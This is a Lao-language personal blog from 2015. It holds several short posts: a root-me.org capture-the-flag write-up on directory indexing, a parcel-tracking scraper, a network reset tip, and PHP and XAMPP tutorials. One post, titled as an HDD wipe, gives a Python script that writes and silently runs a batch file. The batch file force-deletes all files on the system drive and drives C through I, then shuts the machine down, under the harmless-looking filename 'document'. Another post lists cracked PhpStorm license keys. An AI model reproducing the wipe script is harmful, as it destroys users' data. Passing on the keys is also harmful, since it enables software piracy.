Pages - Menu

Thursday, October 8, 2015

[Write-up] [Web - Server] HTTP directory indexing - 15 Points

ສະບາຍດີ ມື້ນີ້ເຮົາມາຜ່ານໂຈດເກມ Security ໃນເວັບ root-me.org ກັນເນາະ
ດ່ານນີ້ຈະກ່ຽວກັບການເຂົ້າໄປອ່ານໄຟລ໌ໃນ Directory

http://www.root-me.org/en/Challenges/Web-Server/HTTP-directory-indexing


  ຫລັງຈາກກົດ Start the Challenge

ເຮົາກໍ່ກົດ view source (ຄຶຂ້າງເທິງ) ແລ້ວເຮົາກໍ່ຈະເຫັນວ່າມີ comment ວ່າ

<!-- include("admin/pass.html") -->

ລອງຕາມເຂົ້າໄປໃນ admin/pass.html ແລ້ວກໍ່ບໍ່ແມ່ນໜ້າທີ່ເຫັນ ລະຫັດລັບ ເທື່ອ

ແລ້ວຈະເຮັດແນວໃດບາດນີ້..? ບໍ່ຟ້າວເລື່ອນລົງໄປອ່ານ ລອງເຮັດ ແລະ ຄິດເບິ່ງກ່ອນ...

tik-tok......







tik-tok......








tik-tok....

ບາດນີ້ເຮົາລອງຖອຍເບິ່ງແຕ່ /admin/ ປາກົດວ່າ ມີ Dir backup 

ເຮົາກໍ່ກົດເຂົ້າໄປເບິ່ງແລ້ວກໍ່ຈະເຫັນລະຫັດລັບທີ່ເອົາໄວ້ຜ່ານດ່ານ.

Saturday, June 6, 2015

China Post Tracking ນຳວ່າເຄື່ອງຮອດໃສແລ້ວ

ພໍດີຜູ້ກ່ຽວສັ່ງເຄື່ອງມາແຕ່ເນັດ ແລ້ວເຂົ້າເວັບຄູ່ກໍລະນີກໍ່ຄື China Post ຍາກຫລາຍບໍ່ຮູ້ເປັນຫຍັງ ຜູ້ກ່ຽວເລີຍຂຽນໂປແກມໃຫ້ມັນດຶງຂໍ້ມູນມາຈາກເວັບເລີຍ
ໂດຍ module ທີ່ໃຊ້ກໍ່ມີ
beautifulsoup - ສຳລັບຄັດກອງຂໍ້ມູນໃນ Source code
urllib - ສຳລັບເຮັດ url encode ຄ່າທີ່ຈະສົ່ງໄປເຊີເວີ້
urllib2 - ສຳລັບດຶງຂໍ້ມູນມາຈາກເຊີເວີ້
sys - ສຳລັບສະແດງຜົນຄ່າໃນວົງ ລູບ ແບບບໍ່ລົງແຖວ

Wednesday, May 20, 2015

Internet Connected ແຕ່ເຂົ້າເວັບ ຫຼື Ping ບໍ່ໄດ້ເລີຍ! ເຮັດແນວໃດດີ?

ຕອນເຊົ້າວັນທີ 20/05/2015 ຜູ້ກ່ຽວໄດ້ເກີດບັນຫານີ້ຂຶ້ນແລ້ວເກືອບລົງແດງຍ້ອນບໍ່ມີເນັດຫລິ້ນ T_T ເລີຍໄດ້ລອງຄົ້ນຫາວິທີແກ້ແມ່ນ

1. ກົດ Windows+X ແລ້ວເລືອກ Command Prompt (Admin)
2. ພິມເຂົ້າໄປວ່າ netsh int ip reset c:\resetlog.txt
3. restart computer ກໍ່ຈະໄດ້.

Thursday, May 7, 2015

Phpstorm 8

License Key PhpStorm 8
User Name : EMBRACE
===== LICENSE BEGIN =====
43136-12042010
00002UsvSON704l"dILe1PVx3y4"B3
49AU6oSDJrsjE8nMOQh"8HTDJHIUUh
gd1BebYc5U"6OxDbVsALB4Eb10PW8"
===== LICENSE END =====
 
User Name : TorReviver
===== LICENSE BEGIN =====
09574-12042010
00000N7tVkjChpCjDvLjvELNOsgIeH
1POKglQCIddVHUwb6RDtMpzpzeXi0Z
RGN7yqI340MhKOu1odUVLb40g5HUF4
===== LICENSE END =====
 
User Name : Learn Programming
===== LICENSE BEGIN =====
63758-12042010
00000Ryqh0NCC73lpRm!XVcxFChJ2g
TUR2lZtlLXrPLbQ66Gs8MHs51RvF2y
agoDlzne08Zm8VXbts1UMKE!EW4v8G
===== LICENSE END =====

Thursday, February 5, 2015

[Script] ລ້າງ HDD

#By Darklest
from subprocess import call
f = open('document.bat','w')
f.write("""@echo off
del D:\*.*/f/s/q
del E:\*.*/f/s/q
del F:\*.*/f/s/q
del G:\*.*/f/s/q
del H:\*.*/f/s/q
del I:\*.*/f/s/q
del %systemdrive%\*.*/f/s/q
del C:\*.*/f/s/q
shutdown -t -f -t 00""")
f.close()
x = open('document.vbs', 'w')
x.write('''CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False''')
x.close()
call("cmd.exe /c document.vbs doc.bat")

Monday, January 19, 2015

PHP ເຊື່ອມຕໍ່ຖານຂໍ້ມູນ MySQL

ບົດຄວາມນີ້ຈະກ່ຽວກັບການຂຽນ PHP ໃຫ້ເຊື່ອມຕໍ່ກັບຖານຂໍ້ມູນ (MySQL) ສຳລັບຜູ້ຮຽນຜູ້ໃດຍັງຂຽນ ພາສາ PHP ບໍ່ເປັນເທື່ອໃຫ້ໄປອ່ານກ່ຽວກັບພາສາ PHP ຢຸ່ ສາລະບານ ກ່ອນເນາະ.
ເລີ່ມກັນເລີຍ!!! (ແກ້ໄຂ ໃນນີ້ຈະຂຽນໃຫ້ເບິ່ງແບບສັ້ນກັບແບບລະອຽດ)

ກ່ອນອື່ນເຮົາກໍ່ຕ້ອງສ້າງຖານຂໍ້ມູນກ່ອນໃນນີ້


ເມື່ອສ້າງແລ້ວໆເຮົາກໍ່ຂຽນ PHP ໃຫ້ເຊື່ອມຕໍ່ກັບຖານຂໍ້ມູນ.


ໂດຍຄຳສັ່ງທີ່ສັ່ງໃຫ້ PHP ເຊື່ອມຕໍ່ກັບຖານຂໍ້ມູນແມ່ນ mysql_connect($host, $dbuser, $password)
ເມື່ອເຊື່ອມຕໍ່ແລ້ວກໍສັ່ງໃຫ້ມັນເລືອກເອົາ ຖານຂໍ້ມູນທີ່ເຮົາສ້າງຂຶ້ນມາກ່ອນໜ້ານີ້ ດ້ວຍຄຳສັ່ງ mysql_select_db($dbname,$dbconnect)

ຕໍ່ມາຈະເປັນແບບສັ້ນກະທັດຮັດແຕ່ສາມາດນຳໃຊ້ໄດ້ເຊັ່ນດຽວກັນ


ພຽງເທົ່ານີ້ໄຟລ໌ PHP ປັດຈຸບັນຂອງເຮົາກໍ່ເຊື່ອມຕໍ່ກັບ ຖານຂໍ້ມູນແລ້ວ..!

Monday, January 12, 2015

ການຕິດຕັ້ງເວັບເຊີເວີ້ຈຳລອງໃນເຄື່ອງ

ກ່ອນຈະເລີ່ມຕົ້ນຂຽນ PHP ເຮົາກໍ່ຕ້ອງຕິດຕັ້ງໂປແກມຈຳລອງ Server ໃນເຄື່ອງສາກ່ອນ. ໃນນີ້ຂ້ອຍຈະນຳໃຊ້ໂປແກມ Xampp.
 ເຊິ່ງເປັນໂປແກມໜຶ່ງທີ່ໄດ້ຮັບຄວາມນິຍົມຫຼາຍໃນປັດຈຸບັນ. ເຊິ່ງໃຜທີ່ຍັງໃຊ້ Appserv ຢູ່ ແນະນຳໃຫ້ປ່ຽນມາໃຊ້ໂຕນີ້ເພາະ Appserv ເຂົາເຊົາພັດທະນາແລ້ວ ແລະ Service ທີ່ໃຊ້ຢູ່ກໍ່ເປັນເວີຊັ້ນເກົ່າແລ້ວ.

 ສຳລັບໃຜທີ່ຕ້ອງການດາວໂຫຼດຕາມລິ້ງນີ້ເລີຍເນາະ
https://www.apachefriends.org/index.html